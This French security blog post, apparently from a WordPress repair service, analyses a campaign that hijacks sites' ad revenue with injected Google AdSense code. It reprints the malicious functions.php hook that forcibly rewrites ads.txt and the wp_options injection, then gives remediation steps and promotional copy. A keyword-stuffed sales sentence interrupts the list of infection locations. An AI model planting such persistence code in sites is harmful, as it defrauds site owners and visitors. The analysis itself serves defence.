Protégez votre site WordPress des pirates Google AdSense
Récemment, j’ai rencontré plusieurs cas où des sites WordPress ont été victimes de pirates exploitant Google AdSense. Ces attaquants injectent des publicités et des scripts pour détourner les ressources du site et gonfler artificiellement les vues de leurs annonces AdSense. Ce n’est pas la première fois que nous voyons des cybercriminels abuser de services populaires de Google. Par le passé, nous avons découvert un skimmer de cartes de crédit caché dans Google Tag Manager, permettant aux attaquants de voler des informations de paiement sur des sites Magento. Les cybercriminels exploitent des plateformes de confiance comme Google AdSense et Google Tag Manager pour compromettre les sites web.
Qu’est-ce que Google Ads et AdSense ?
Avant de plonger dans les détails techniques de cette infection, il est important de comprendre ce que sont Google Ads et AdSense dans leur forme légitime.
Google Ads est une plateforme de publicité en ligne développée par Google où les annonceurs enchérissent pour afficher de courtes publicités, des offres de services, des listes de produits ou des vidéos aux utilisateurs du web. Les annonceurs paient pour afficher des annonces au sein du réseau publicitaire de Google.
Google AdSense, quant à lui, est un programme géré par Google permettant aux éditeurs de sites web de diffuser automatiquement des publicités textuelles, graphiques, vidéo ou interactives ciblées en fonction du contenu du site et de l’audience. Ces annonces sont administrées, triées et maintenues par Google, et peuvent générer des revenus au clic ou à l’impression.
Les propriétaires de sites intègrent généralement ces services en plaçant des extraits de code JavaScript spécifiques sur leurs pages, qui communiquent ensuite avec les serveurs de Google pour afficher les publicités.
Ce que nous avons découvert
En examinant plusieurs sites, nous avons trouvé du code AdSense suspect qui n’aurait pas dû s’y trouver. Voici quelques exemples d’ID AdSense utilisés par les attaquants :
- pub-9649546719576241
- pub-7310257338111337
Des domaines impliqués dans cette campagne sont actuellement sur liste noire, tels que :
- link-cpa-anda[.]com
- Asthmanotchcave[.]com
Où se trouve l’infection ?
Le code malveillant a été trouvé à plusieurs endroits sur les sites WordPress infectés, indiquant une approche raffinée pour assurer la persistance même si un point d’injection est nettoyé. L’infection a été découverte dans : Cette situation met en lumière la nécessité d’une vigilance accrue concernant les plugin wordpress malveillant et sécurité. Les propriétaires de sites doivent régulièrement auditer leurs installations et vérifier les thèmes et extensions utilisés afin d’éliminer toute menace potentielle. La sensibilisation à ces risques est essentielle pour protéger les données des utilisateurs et garantir l’intégrité des sites web.
- Le fichier functions.php du thème
- Le répertoire mu-plugins
- Divers répertoires de plugins
- La table wp_options, spécifiquement dans l’entrée option_name = wpheaderandfooter_basics
Analyse du code malveillant
Examinons le code injecté dans ces sites WordPress :
Code trouvé dans le fichier functions.php du thème
Ce code a été injecté pour modifier le fichier ads.txt et sera recréé automatiquement, garantissant que le réseau publicitaire de l’attaquant reste actif :
add_action('init', function() {
$x1 = ABSPATH . 'ads.txt';
$x2 = "google.com, pub-7310257338111337, DIRECT, f08c47fec0942fa0";
if (!file_exists($x1) || trim(file_get_contents($x1)) !== trim($x2)) {
if (file_exists($x1)) {
unlink($x1);
}
file_put_contents($x1, $x2);
chmod($x1, 0644);
error_log("[ads.txt Monitor] File updated on " . date('Y-m-d H:i:s'));
}
});
Infection stockée dans la table wp_options
L’entrée de la base de données contenait le script Google Ads suivant :
a:3:{s:18:"wp_header_textarea";s:155:"
<script async src=\"https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9649546719576241\"
crossorigin=\"anonymous\"></script>";s:16:"wp_body_textarea";s:0:"";s:18:"wp_footer_textarea";s:0:"";}
Cela garantit que les annonces indésirables sont servies dynamiquement via la base de données, assurant la persistance même si les injections basées sur les fichiers sont supprimées.
Comment ce malware s’est-il introduit ?
Le point d’entrée exact n’est pas clair, mais d’après les cas précédents, voici les vecteurs d’attaque probables :
- Comptes administrateurs compromis : Si un attaquant accède au panneau d’administration WordPress, il peut modifier les fichiers et les entrées de la base de données.
- Plugins ou thèmes vulnérables : L’exploitation de failles de sécurité connues dans des plugins ou thèmes obsolètes peut fournir un accès.
- Permissions de fichiers non sécurisées : Des permissions de fichiers faibles peuvent permettre des modifications non autorisées.
Pourquoi font-ils cela ?
Simplement pour l’argent. Ils essaient d’utiliser les ressources de votre site pour continuer à diffuser des annonces, et pire encore, ils pourraient voler vos revenus publicitaires si vous utilisez AdSense vous-même. En injectant leur propre code Google AdSense, ils sont payés à votre place. Et en modifiant le fichier ads.txt, ils s’assurent que leur réseau publicitaire reste actif sur votre site.
Impact du malware
L’impact de ce malware inclut :
- Perte de revenus : Les propriétaires de sites légitimes perdent des revenus publicitaires potentiels car les attaquants les redirigent vers leurs propres comptes.
- Expérience utilisateur compromise : Des annonces inattendues peuvent perturber l’expérience utilisateur et entraîner une perte de confiance et de trafic.
- Dommages SEO : L’injection de code malveillant peut nuire au référencement d’un site, entraînant potentiellement une baisse des classements dans les moteurs de recherche.
- Risques de sécurité : Le code injecté peut être une porte d’entrée pour d’autres activités malveillantes, telles que la distribution de malware ou le vol de données.
Étapes de remédiation
Si vous découvrez que votre site est infecté par de fausses annonces Google, suivez ces étapes :
- Scannez votre site web : Utilisez des outils comme le SiteCheck gratuit de Sucuri pour détecter les malwares.
- Supprimez le code infecté : Vérifiez les fichiers header.php, functions.php, le répertoire mu-plugins et la table wp_options.
- Mettez tout à jour : Assurez-vous que WordPress, les plugins et les thèmes sont à jour.
- Changez tous les mots de passe : Mettez à jour les mots de passe de l’administration WordPress, de la base de données et de l’hébergement.
- Définissez des permissions de fichiers appropriées : Restreignez l’accès en écriture aux fichiers critiques.
- Activez un pare-feu d’application web (WAF) : Un WAF peut bloquer les requêtes malveillantes avant qu’elles n’atteignent votre site.
Nos solutions pour une sécurité renforcée
En tant qu’experts en réparation d’urgence WordPress, nous proposons une analyse complète, le nettoyage des malwares, la suppression des backdoors et le renforcement de la sécurité. Notre service de maintenance inclut l’installation d’antivirus, les mises à jour régulières, les sauvegardes et une surveillance 24/7, avec option d’hébergement Premium en France. Pour optimiser votre visibilité en ligne, nous offrons des services d’optimisation SEO technique, de stratégie éditoriale et de création de contenus ciblés. Pour garantir une sécurité accrue de votre site, il est essentiel de comprendre les iframes malveillants, souvent utilisés par les cybercriminels pour injecter des code nuisibles. Nos experts effectuent une analyse approfondie afin de détecter ces menaces invisibles et d’y remédier efficacement. Grâce à notre savoir-faire, vous pourrez naviguer sereinement, en ayant l’assurance que votre site est protégé contre toutes les formes d’attaques. De plus, nous proposons des solutions pour éliminer le spam afin de garantir une expérience utilisateur optimale. Grâce à notre expertise, nous pouvons également analyser vos campagnes marketing pour maximiser leur efficacité tout en préservant l’intégrité de votre site. Enfin, nous sommes disponibles pour des consultations personnalisées afin d’adapter nos services à vos besoins spécifiques.
Conclusion
Cette dernière campagne de pirates Google AdSense démontre comment les attaquants continuent d’évoluer dans leurs tactiques, en exploitant des plateformes de confiance comme Google AdSense pour maintenir leurs flux de revenus. En comprenant comment ces infections fonctionnent et où elles se cachent, les propriétaires de sites peuvent mieux protéger leurs sites et leurs visiteurs contre ces menaces de plus en plus sophistiquées.
Comme nous l’avons vu avec ce cas et notre précédente enquête sur l’utilisation de Google Tag Manager pour le skimming de cartes de crédit, les attaquants ciblent de plus en plus les services tiers légitimes que les sites web intègrent couramment.
Si vous gérez un site WordPress, scannez régulièrement vos fichiers, surveillez votre base de données et appliquez les meilleures pratiques de sécurité pour garder votre site sécurisé.
Pour toute assistance, n’hésitez pas à faire appel à nos services de réparation d’urgence, de maintenance et d’optimisation SEO. Nous sommes là pour vous aider à protéger votre site et à maximiser son potentiel.
Benjamin Bueno, Expert en Sécurité WordPress chez SécuritéWP
